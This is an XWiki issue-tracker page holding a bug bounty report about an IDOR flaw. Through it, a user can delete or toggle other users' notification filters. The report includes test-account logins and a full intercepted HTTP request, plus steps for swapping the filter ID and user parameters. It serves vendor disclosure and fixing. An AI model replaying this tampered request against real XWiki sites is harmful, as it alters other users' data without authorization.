Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-20337

Delete/edit the custom filters of other users

    XMLWordPrintable

Details

    • Unknown
    • N/A

    Description

      SUBMISSION REFERENCES

      RESEARCHER INFORMATION

      • Submitter: floerer

      SUBMISSION INFORMATION

      • Created at: Thu, 03 Nov 2022 07:19:07 GMT
      • Submission status: Archived

      REPORT CONTENT

      • Severity: Medium (5.3)
      • Domain: https://intigriti.xwiki.com/ (Url)
      • Proof of concept: It is possible to delete the custom filters of other users or turn them on or off.
        This is possible because of an IDOR.

      *Steps to reproduce*
      1. Login on https://intigriti.xwiki.com with `floerer` and password `Intigriti1`
      2. Now go to https://intigriti.xwiki.com/xwiki/bin/edit/XWiki/floerer?editor=inline&category=notifications and scroll all the way down.
      3. You will see a `custom filter`
      4. Now also login with a different account on https://intigriti.xwiki.com with `floerer1` and password `Intigriti2`
      5. Also go to https://intigriti.xwiki.com/xwiki/bin/edit/XWiki/floerer?editor=inline&category=notifications and scroll all the way down.
      6. You will see another custom filter here.
      7. On this account (the second) click on `Delete` and now intercept the HTTP requests while clicking on `Yes`
      8. A request like this will come by:

      ```
      POST /xwiki/bin/get/XWiki/Notifications/Code/NotificationPreferenceService?outputSyntax=plain HTTP/1.1
      Host: intigriti.xwiki.com
      Cookie:
      validation="d429f244b1db53bd481daafc7c876e33"
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
      Accept: /
      Accept-Language: nl,en-US;q=0.7,en;q=0.3
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      X-Requested-With: XMLHttpRequest
      Content-Length: 108
      Origin: https://intigriti.xwiki.com
      Referer: https://intigriti.xwiki.com/xwiki/bin/edit/XWiki/floerer?editor=inline&category=notifications&livedata-config-user.profile.group.table=EYCQ1ghgGhByDqBLApsYF3CA

      action=deleteFilterPreference&filterPreferenceId=NFP_14&csrf=sNDu8B6axbgbixVujafDrg&target=user&user=floerer1
      ```

      9. Change the `filterPreferenceId` value to `NFP_11` and the `user` value to `floerer`
      10. Now forward the request and reload the page of the first account, you will see the custom filter is gone.

      Attachments

        Issue Links

          causes

          Bug - A problem which impairs or prevents the functions of the product. XWIKI-21815 Can't follow any users - Error saving the notification setting

          • Blocker - Blocks development and/or testing work, production could not run.
          • Closed
          is caused by

          Improvement - An improvement or enhancement to an existing feature or task. XWIKI-16158 Allow admin to access the notification preferences of other users

          • Major - Major loss of function.
          • Closed
          relates to

          Security - Security bug with confidential level XWIKI-20336 Read notification filters of other users

          • Major - Major loss of function.
          • Closed

          Activity

            People

              surli Simon Urli
              intigriti Intigriti Integration
              Votes:
              0 Vote for this issue
              Watchers:
              2 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: